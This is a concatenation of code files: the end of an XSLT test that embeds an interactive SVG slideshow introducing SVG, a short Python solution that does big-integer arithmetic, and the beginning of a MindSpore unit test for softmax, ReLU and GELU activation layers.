var showSlideName = slideList[showSlide];
/*if(hideSlideName == null)
alert("hideSlideName is null");
else
alert("hideSlideName is NOT null:" + hideSlideName);*/
var slideGroup = doc.getElementById(hideSlideName);
slideGroup.setAttribute("style", "visibility:hidden");
slideGroup = doc.getElementById(showSlideName);
slideGroup.setAttribute("style", "visibility:show");
var slideMenuItemId = slideList[hideSlide] + "MenuItem";
var menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "slideMenuItem");
slideMenuItemId = slideList[showSlide] + "MenuItem";
menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "currentSlideMenuItem");
}
function onHighlightMenuItem(evt, highlight, itemId){
var target = evt.getTarget();
var doc = target.getOwnerDocument();
var menuItem = doc.getElementById(itemId);
if(highlight == "true")
menuItem.setAttribute("class", "highlightedSlideMenuItem");
else{
var curSlideMenuItemId = slideList[curSlide] + "MenuItem";
if(curSlideMenuItemId == itemId)
menuItem.setAttribute("class", "currentSlideMenuItem");
else
menuItem.setAttribute("class", "slideMenuItem");
}
}
function onMenuItemSelected(evt, index){
// alert("Should show slide # " + index);
var oldCurSlide = curSlide;
curSlide = index;
hideAndShow(evt, oldCurSlide, index);
}
function onSetFill(evt, elementId, fillValue){
var element = doc.getElementById(elementId);
element.setAttribute("style", "fill:" + fillValue);
}
function onExpand(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
var javaScriptCode = "window.expandNow('" + submenuGroupId + "')";
window.expandNow = expandNow;
setTimeout(javaScriptCode, 1000);
}
function expandNow(submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:show");
}
function onCollapse(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
}
]]></script>
<script><![CDATA[
var slideList = new Array();
var slideIndex = new Object();
var curSlide = 0;
slideList[0]="slideShowCover";
slideIndex["slideShowCover"] = 0;
slideList[1]="slidesetCover1";
slideIndex["slidesetCover1"] = 1;
slideList[2] = "slide1-1";
slideIndex["slide1-1"] = 2;
slideList[3]="slidesetCover2";
slideIndex["slidesetCover2"] = 3;
slideList[4] = "slide2-1";
slideIndex["slide2-1"] = 4;
slideList[5] = "slide2-2";
slideIndex["slide2-2"] = 5;
slideList[6] = "slide2-3";
slideIndex["slide2-3"] = 6;
slideList[7]="slidesetCover3";
slideIndex["slidesetCover3"] = 7;
slideList[8] = "slide3-1";
slideIndex["slide3-1"] = 8;
slideList[9] = "slide3-2";
slideIndex["slide3-2"] = 9;
]]></script>
<defs>
<linearGradient spreadMethod='pad' id='slideBackgroundPaint' x1='0' y2='768' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideTitleSeparatorPaint' x1='0' y2='0' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
<stop offset='.5' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='menuBarPaint' x1='0' y2='0' x2='210' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideBackgroundHeaderPaint' x1='0' y2='100' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<g id='stripePattern'>
<g style='fill:black; fill-opacity:.25'>
<rect height='2' width='1' y='0'/>
<rect height='2' width='1' y='4'/>
<rect height='2' width='1' y='8'/>
<rect height='2' width='1' y='12'/>
<rect height='2' width='1' y='16'/>
<rect height='2' width='1' y='20'/>
<rect height='2' width='1' y='24'/>
<rect height='2' width='1' y='28'/>
<rect height='2' width='1' y='32'/>
<rect height='2' width='1' y='36'/>
<rect height='2' width='1' y='40'/>
<rect height='2' width='1' y='44'/>
<rect height='2' width='1' y='48'/>
<rect height='2' width='1' y='52'/>
<rect height='2' width='1' y='56'/>
<rect height='2' width='1' y='60'/>
<rect height='2' width='1' y='64'/>
<rect height='2' width='1' y='68'/>
<rect height='2' width='1' y='72'/>
<rect height='2' width='1' y='76'/>
<rect height='2' width='1' y='80'/>
<rect height='2' width='1' y='84'/>
<rect height='2' width='1' y='88'/>
<rect height='2' width='1' y='92'/>
<rect height='2' width='1' y='96'/>
<rect height='2' width='1' y='100'/>
<rect height='2' width='1' y='104'/>
<rect height='2' width='1' y='108'/>
<rect height='2' width='1' y='112'/>
<rect height='2' width='1' y='116'/>
<rect height='2' width='1' y='120'/>
<rect height='2' width='1' y='124'/>
<rect height='2' width='1' y='128'/>
<rect height='2' width='1' y='132'/>
<rect height='2' width='1' y='136'/>
<rect height='2' width='1' y='140'/>
<rect height='2' width='1' y='144'/>
<rect height='2' width='1' y='148'/>
<rect height='2' width='1' y='152'/>
<rect height='2' width='1' y='156'/>
<rect height='2' width='1' y='160'/>
<rect height='2' width='1' y='164'/>
<rect height='2' width='1' y='168'/>
<rect height='2' width='1' y='172'/>
<rect height='2' width='1' y='176'/>
<rect height='2' width='1' y='180'/>
<rect height='2' width='1' y='184'/>
<rect height='2' width='1' y='188'/>
<rect height='2' width='1' y='192'/>
<rect height='2' width='1' y='196'/>
<rect height='2' width='1' y='200'/>
<rect height='2' width='1' y='204'/>
<rect height='2' width='1' y='208'/>
<rect height='2' width='1' y='212'/>
<rect height='2' width='1' y='216'/>
<rect height='2' width='1' y='220'/>
<rect height='2' width='1' y='224'/>
<rect height='2' width='1' y='228'/>
<rect height='2' width='1' y='232'/>
<rect height='2' width='1' y='236'/>
<rect height='2' width='1' y='240'/>
<rect height='2' width='1' y='244'/>
<rect height='2' width='1' y='248'/>
<rect height='2' width='1' y='252'/>
<rect height='2' width='1' y='256'/>
<rect height='2' width='1' y='260'/>
<rect height='2' width='1' y='264'/>
<rect height='2' width='1' y='268'/>
<rect height='2' width='1' y='272'/>
<rect height='2' width='1' y='276'/>
<rect height='2' width='1' y='280'/>
<rect height='2' width='1' y='284'/>
<rect height='2' width='1' y='288'/>
<rect height='2' width='1' y='292'/>
<rect height='2' width='1' y='296'/>
<rect height='2' width='1' y='300'/>
<rect height='2' width='1' y='304'/>
<rect height='2' width='1' y='308'/>
<rect height='2' width='1' y='312'/>
<rect height='2' width='1' y='316'/>
<rect height='2' width='1' y='320'/>
<rect height='2' width='1' y='324'/>
<rect height='2' width='1' y='328'/>
<rect height='2' width='1' y='332'/>
<rect height='2' width='1' y='336'/>
<rect height='2' width='1' y='340'/>
<rect height='2' width='1' y='344'/>
<rect height='2' width='1' y='348'/>
<rect height='2' width='1' y='352'/>
<rect height='2' width='1' y='356'/>
<rect height='2' width='1' y='360'/>
<rect height='2' width='1' y='364'/>
<rect height='2' width='1' y='368'/>
<rect height='2' width='1' y='372'/>
<rect height='2' width='1' y='376'/>
<rect height='2' width='1' y='380'/>
<rect height='2' width='1' y='384'/>
<rect height='2' width='1' y='388'/>
<rect height='2' width='1' y='392'/>
<rect height='2' width='1' y='396'/>
<rect height='2' width='1' y='400'/>
<rect height='2' width='1' y='404'/>
<rect height='2' width='1' y='408'/>
<rect height='2' width='1' y='412'/>
<rect height='2' width='1' y='416'/>
<rect height='2' width='1' y='420'/>
<rect height='2' width='1' y='424'/>
<rect height='2' width='1' y='428'/>
<rect height='2' width='1' y='432'/>
<rect height='2' width='1' y='436'/>
<rect height='2' width='1' y='440'/>
<rect height='2' width='1' y='444'/>
<rect height='2' width='1' y='448'/>
<rect height='2' width='1' y='452'/>
<rect height='2' width='1' y='456'/>
<rect height='2' width='1' y='460'/>
<rect height='2' width='1' y='464'/>
<rect height='2' width='1' y='468'/>
<rect height='2' width='1' y='472'/>
<rect height='2' width='1' y='476'/>
<rect height='2' width='1' y='480'/>
<rect height='2' width='1' y='484'/>
<rect height='2' width='1' y='488'/>
<rect height='2' width='1' y='492'/>
<rect height='2' width='1' y='496'/>
<rect height='2' width='1' y='500'/>
<rect height='2' width='1' y='504'/>
<rect height='2' width='1' y='508'/>
<rect height='2' width='1' y='512'/>
<rect height='2' width='1' y='516'/>
<rect height='2' width='1' y='520'/>
<rect height='2' width='1' y='524'/>
<rect height='2' width='1' y='528'/>
<rect height='2' width='1' y='532'/>
<rect height='2' width='1' y='536'/>
<rect height='2' width='1' y='540'/>
<rect height='2' width='1' y='544'/>
<rect height='2' width='1' y='548'/>
<rect height='2' width='1' y='552'/>
<rect height='2' width='1' y='556'/>
<rect height='2' width='1' y='560'/>
<rect height='2' width='1' y='564'/>
<rect height='2' width='1' y='568'/>
<rect height='2' width='1' y='572'/>
<rect height='2' width='1' y='576'/>
<rect height='2' width='1' y='580'/>
<rect height='2' width='1' y='584'/>
<rect height='2' width='1' y='588'/>
<rect height='2' width='1' y='592'/>
<rect height='2' width='1' y='596'/>
<rect height='2' width='1' y='600'/>
<rect height='2' width='1' y='604'/>
<rect height='2' width='1' y='608'/>
<rect height='2' width='1' y='612'/>
<rect height='2' width='1' y='616'/>
<rect height='2' width='1' y='620'/>
<rect height='2' width='1' y='624'/>
<rect height='2' width='1' y='628'/>
<rect height='2' width='1' y='632'/>
<rect height='2' width='1' y='636'/>
<rect height='2' width='1' y='640'/>
<rect height='2' width='1' y='644'/>
<rect height='2' width='1' y='648'/>
<rect height='2' width='1' y='652'/>
<rect height='2' width='1' y='656'/>
<rect height='2' width='1' y='660'/>
<rect height='2' width='1' y='664'/>
<rect height='2' width='1' y='668'/>
<rect height='2' width='1' y='672'/>
<rect height='2' width='1' y='676'/>
<rect height='2' width='1' y='680'/>
<rect height='2' width='1' y='684'/>
<rect height='2' width='1' y='688'/>
<rect height='2' width='1' y='692'/>
<rect height='2' width='1' y='696'/>
<rect height='2' width='1' y='700'/>
<rect height='2' width='1' y='704'/>
<rect height='2' width='1' y='708'/>
<rect height='2' width='1' y='712'/>
<rect height='2' width='1' y='716'/>
<rect height='2' width='1' y='720'/>
<rect height='2' width='1' y='724'/>
<rect height='2' width='1' y='728'/>
<rect height='2' width='1' y='732'/>
<rect height='2' width='1' y='736'/>
<rect height='2' width='1' y='740'/>
<rect height='2' width='1' y='744'/>
<rect height='2' width='1' y='748'/>
<rect height='2' width='1' y='752'/>
<rect height='2' width='1' y='756'/>
<rect height='2' width='1' y='760'/>
<rect height='2' width='1' y='764'/>
<rect height='2' width='1' y='768'/>
<rect height='2' width='1' y='772'/>
<rect height='2' width='1' y='776'/>
<rect height='2' width='1' y='780'/>
<rect height='2' width='1' y='784'/>
<rect height='2' width='1' y='788'/>
<rect height='2' width='1' y='792'/>
<rect height='2' width='1' y='796'/>
</g>
</g>
<g id='bullet' transform='translate(0, -20)'>
<path style='stroke:white; stroke-width:2; fill:none' d='M0.436,1.418C7.853-1.088,16.396,1.706,19.52,7.658c2.498,4.762-0.287,10.248-6.22,12.252c-4.747,1.604-10.215-0.184-12.213-3.993c-1.599-3.048,0.183-6.559,3.981-7.842c3.038-1.026,6.538,0.118,7.816,2.556 c1.024,1.951-0.117,4.198-2.547,5.019c-1.945,0.657-4.185-0.076-5.003-1.636c-0.655-1.248,0.075-2.686,1.63-3.212c1.245-0.42,2.678,0.048,3.202,1.047'/>
</g>
</defs>
<g id='slideBackground' class='slideBackground'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='668' style='fill:url(#menuBarPaint)' width='210' x='0' y='100'/>
<rect height='100' style='fill:url(#slideBackgroundHeaderPaint)' width='1024' x='0' y='0'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<rect height='5' style='fill:url(#slideTitleSeparatorPaint)' width='1024' x='0' y='100'/>
</g>
<g id='navigationGroup' style='fill:white' transform='translate(984, 45) scale(2, 2)'>
<polygon id='prevSlideControl' onclick='onPrevSlide(evt)' onmouseover="onSetFill(evt, 'prevSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'prevSlideControl', 'white')" transform='rotate(180)'/>
<polygon id='nextSlideControl' onclick='onNextSlide(evt)' onmouseover="onSetFill(evt, 'nextSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'nextSlideControl', 'white')"/>
</g>
<g id='slideMenu' transform='translate(15, 130)'>
<text onclick='onMenuItemSelected(evt, 1)' class='slidesetMenuHeader' x='0' y='0'>Background and Motivation</text>
<g style='visibility:visible'>
<rect height='5' id='Expand1' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu1')" style='fill:white' width='5'/>
<rect height='5' id='Collapse1' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu1')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand1.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand1.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu1'>
<text id='slide1-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide1-1MenuItem')" onclick='onMenuItemSelected(evt, 2)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide1-1MenuItem')" class='slideMenuItem'>Why Yet Another Grap...</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 3)' class='slidesetMenuHeader' x='0' y='0'>The ABCs of SVG</text>
<g style='visibility:visible'>
<rect height='5' id='Expand2' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu2')" style='fill:white' width='5'/>
<rect height='5' id='Collapse2' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu2')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand2.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand2.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu2'>
<text id='slide2-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-1MenuItem')" onclick='onMenuItemSelected(evt, 4)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-1MenuItem')" class='slideMenuItem'>SVG Features</text>
<text id='slide2-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-2MenuItem')" onclick='onMenuItemSelected(evt, 5)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-2MenuItem')" class='slideMenuItem'>SVG Sample Source</text>
<text id='slide2-3MenuItem' x='10' y='60' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-3MenuItem')" onclick='onMenuItemSelected(evt, 6)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-3MenuItem')" class='slideMenuItem'>SVG Sample Output</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 7)' class='slidesetMenuHeader' x='0' y='0'>The SVG Community</text>
<g style='visibility:visible'>
<rect height='5' id='Expand3' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu3')" style='fill:white' width='5'/>
<rect height='5' id='Collapse3' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu3')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand3.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand3.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu3'>
<text id='slide3-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-1MenuItem')" onclick='onMenuItemSelected(evt, 8)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-1MenuItem')" class='slideMenuItem'>Some SVG Resources</text>
<text id='slide3-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-2MenuItem')" onclick='onMenuItemSelected(evt, 9)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-2MenuItem')" class='slideMenuItem'>Quote Them on it</text>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand2.click' to='0, 60'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse2.click' to='0, -60'/>
</g>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand1.click' to='0, 20'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse1.click' to='0, -20'/>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slideShowCover'>
<defs>
<linearGradient spreadMethod='pad' id='backgroundPaint' x1='0' y2='768' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='25%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='50%' style='stop-color:white; stop-opacity:1;'/>
<stop offset='75%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:black; stop-opacity:1;'/>
</linearGradient>
<filter height='105%' id='dropShadow' filterUnits='objectBoundingBox' x='0%' width='105%' y='0%'>
<feGaussianBlur in='SourceAlpha' result='blur' stdDeviation='4'/>
<feOffset dy='4' dx='4' result='offsetBlur' in='blur'/>
<feFlood style='flood-color:black' result='solidBlack'/>
<feComposite in='solidBlack' in2='SourceAlpha' result='separation' operator='in'/>
<feOffset dy='-1' dx='-1' result='offsetSeparation' in='separation'/>
<feMerge>
<feMergeNode in='offsetBlur'/>
<feMergeNode in='offsetSeparation'/>
<feMergeNode in='SourceGraphic'/>
</feMerge>
</filter>
</defs>
<rect height='768' style='fill:url(#backgroundPaint)' width='1024'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<g style='filter:url(#dropShadow)'>
<text class='slideCoverTitle' style='text-anchor:middle' x='512' y='300'>Introduction to SVG</text>
<g transform='translate(512, 490)' id='metadata' style='text-anchor:middle;'>
<text x='0' class='slideCoverSubTitle' y='0'>Uche Ogbuji</text>
<text x='0' class='slideCoverSubTitle' y='50'>Principal Consultant</text>
<text x='0' class='slideCoverSubTitle' y='100'>Fourthought Inc.</text>
<text x='0' class='slideCoverSubTitle' y='150'>Front Range XML Keiretsu</text>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover1'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>Background and Motivation</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover2'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The ABCs of SVG</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover3'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The SVG Community</text>
</g>
<g id='slide1-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Why Yet Another Graphics Format?</text>
<g><text x="240" y="150" class="itemClass">Leveraging the existing XML technology base</text></g>
<g><text x="240" y="185" class="itemClass">Integrating graphics into the semantic Web</text></g>
<g><text x="240" y="220" class="itemClass">Giving browsers access to image <tspan class='emphasis'>internals</tspan></text></g>
<g><text x="240" y="255" class="itemClass">Supporting the next generation of browsers</text></g>
</g>
<g id='slide2-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Features</text>
<text x='240' class='headingInline' y='150'>Basic Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='185'/>
<g><text x="270" y="185" class="itemClass">Coordinate spaces and transforms</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='220'/>
<g><text x="270" y="220" class="itemClass">Graphics primitives: ellipses, polygons, polylines, curves, etc.</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='255'/>
<g><text x="270" y="255" class="itemClass">Stylesheets: CSS, XSL, etc.</text></g>
<text x='240' class='headingInline' y='290'>Advanced Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='325'/>
<g><text x="270" y="325" class="itemClass">Raster filter effects</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='360'/>
<g><text x="270" y="360" class="itemClass">Alpha masking</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='395'/>
<g><text x="270" y="395" class="itemClass">Animation</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='430'/>
<g><text x="270" y="430" class="itemClass">Zooming and Panning</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='465'/>
<g><text x="270" y="465" class="itemClass">Scripting and extensibility</text></g>
</g>
<g id='slide2-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Source</text>
<text x='240' class='preformattedInline' y='135'>
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20000802//EN"
"http://www.w3.org/TR/2000/CR-SVG-20000802/DTD/svg-20000802.dtd"
>
<svg width="800" height="800">
<desc>SVG Sample for SunWorld Article</desc>
<style type="text/css">
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: black; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica }
</style>
<ellipse transform="translate(500 200)" rx="250" ry="100"
style="fill: brown; stroke: yellow; stroke-width: 10"/>
<polygon transform="translate(100 200) rotate(45)"
class="Lagos"
points="350,75 379,161 469,161 397,215 423,301 350,250 277,
301 303,215 231,161 321,161"/>
<text class="OrthoLogos" x="400" y="400">TO KALON</text>
<path class="ViaAppia" d="M500,600 C500,500 650,500 650,600
S800,700 800,600"/>
</svg>
</text>
</g>
<g id='slide2-3' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Output</text>
<g transform='translate(240, 135)'>
<svg height='10cm' width='10cm' viewBox='0 0 200 200'>
<desc>SVG Sample for SunWorld Article</desc>
<style type='text/css'>
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: white; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica; fill:white }
</style>
<ellipse transform='translate(500 200)' ry='100' rx='250' style='fill: brown; stroke: yellow; stroke-width: 10'/>
<polygon points='350,75 379,161 469,161 397,215 423,301 350,250 277, 301 303,215 231,161 321,161' transform='translate(100 200) rotate(45)' class='Lagos'/>
<text class='OrthoLogos' x='400' y='400'>TO KALON</text>
<path class='ViaAppia' d='M500,600 C500,500 650,500 650,600 S800,700 800,600'/>
</svg>
</g>
</g>
<g id='slide3-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Some SVG Resources</text>
<g><text x="240" y="150" class="itemClass"><tspan class='linkStyle'>The W3C's SVG Page</tspan></text></g>
<g><text x="240" y="185" class="itemClass"><tspan class='linkStyle'>OpenDirectory SVG Links</tspan></text></g>
<g><text x="240" y="220" class="itemClass"><tspan class='linkStyle'>How to make slides like these</tspan></text></g>
</g>
<g id='slide3-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Quote Them on it</text>
<text x='240' class='paraInline' y='150'>"Over twenty organizations, including Sun Microsystems, Adobe, Apple, IBM, and Kodak, have been involved in defining SVG."<tspan class='emphasis'> -- <NAME>, Sun</tspan>
</text>
<text x='240' class='paraInline' y='185'>"I have been working with computer graphics for
over 25 years and split an immense amount of blood on the floor at
midnight. With SVG I can now do almost anything I want [except for 3D - in
which I also have a molecular interest]. And I suspect that I can stick
with it for the foreseeable future." <tspan class='emphasis'>-- <NAME>, XML-DEV Founder</tspan>
</text>
<text x='240' class='paraInline' y='220'>"I envision a day where we have XHTML Web pages with SVG as the "chrome" of our interfaces--defining the buttons, the layers, the coloring, and the grid--where we can actually use a language that's XML-based rather than theses separate GIF files that can take so long to download. That's certainly one vision; that vision not just extending on the Web, on a monitor, but wireless onto my Palm Pilot or to print and other output as well." <tspan class='emphasis'>-- <NAME>, Razorfish</tspan>
</text>
</g>
</svg>"""
#"'
expected_1="""
<svg/>"""
def Test(tester):
tester.startTest("Checking for SVG stylesheets")
try:
import urllib
for uri in (sheet_1_uri, sheet_2_uri, sheet_3_uri):
fd = urllib.urlopen(uri)
fd.close()
tester.testDone()
except (IOError, OSError):
tester.warning(
"You must have 'svgslides.xsl', 'svgslides_custom.xsl' and\n"
"'slidescript.xsl' from Sun's SVG toolkit to run this test.\n"
"See http://www.sun.com/software/xml/developers/svg-slidetoolkit/\n"
"or ftp://ftp.fourthought.com/pub/third-party/test-material/\n"
"It's enough to copy *.xsl from that package to the\n"
"'%s' directory." % os.path.dirname(__file__))
tester.testDone()
else:
source = test_harness.FileInfo(uri=source_1_uri)
sheet = test_harness.FileInfo(uri=sheet_1_uri)
test_harness.XsltTest(tester, source, [sheet], expected_1)
return
| 2.296875 | 2 |
src/2/2338.py | youngdaLee/Baekjoon | 11 | 16918 | """
2338. 긴자리 계산
작성자: xCrypt0r
언어: Python 3
사용 메모리: 29,380 KB
소요 시간: 72 ms
해결 날짜: 2020년 9월 13일
"""
def main():
A, B = int(input()), int(input())
print(A + B, A - B, A * B, sep='\n')
if __name__ == '__main__':
main()
| 3.390625 | 3 |
tests/ut/python/nn/test_activation.py | PowerOlive/mindspore | 3,200 | 16919 | <filename>tests/ut/python/nn/test_activation.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test Activations """
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.common.api import _cell_graph_executor
from ..ut_filter import non_graph_engine
class SoftmaxNet(nn.Cell):
def __init__(self, dim):
super(SoftmaxNet, self).__init__()
self.softmax = nn.Softmax(dim)
def construct(self, x):
return self.softmax(x)
@non_graph_engine
def test_compile():
net = SoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
@non_graph_engine
def test_compile_axis():
net = SoftmaxNet(-1)
prob = 355
input_data = np.random.randn(4, 16, 1, 1).astype(np.float32) * prob
input_tensor = Tensor(input_data)
net(input_tensor)
class LogSoftmaxNet(nn.Cell):
def __init__(self, dim):
super(LogSoftmaxNet, self).__init__()
self.logsoftmax = nn.LogSoftmax(dim)
def construct(self, x):
return self.logsoftmax(x)
@non_graph_engine
def test_compile_logsoftmax():
net = LogSoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
class Net1(nn.Cell):
def __init__(self):
super(Net1, self).__init__()
self.relu = nn.ReLU()
def construct(self, x):
return self.relu(x)
def test_compile_relu():
net = Net1()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class Net_gelu(nn.Cell):
def __init__(self):
super(Net_gelu, self).__init__()
self.gelu = nn.GELU()
def construct(self, x):
return self.gelu(x)
def test_compile_gelu():
net = Net_gelu()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class NetLeakyReLU(nn.Cell):
def __init__(self, alpha):
super(NetLeakyReLU, self).__init__()
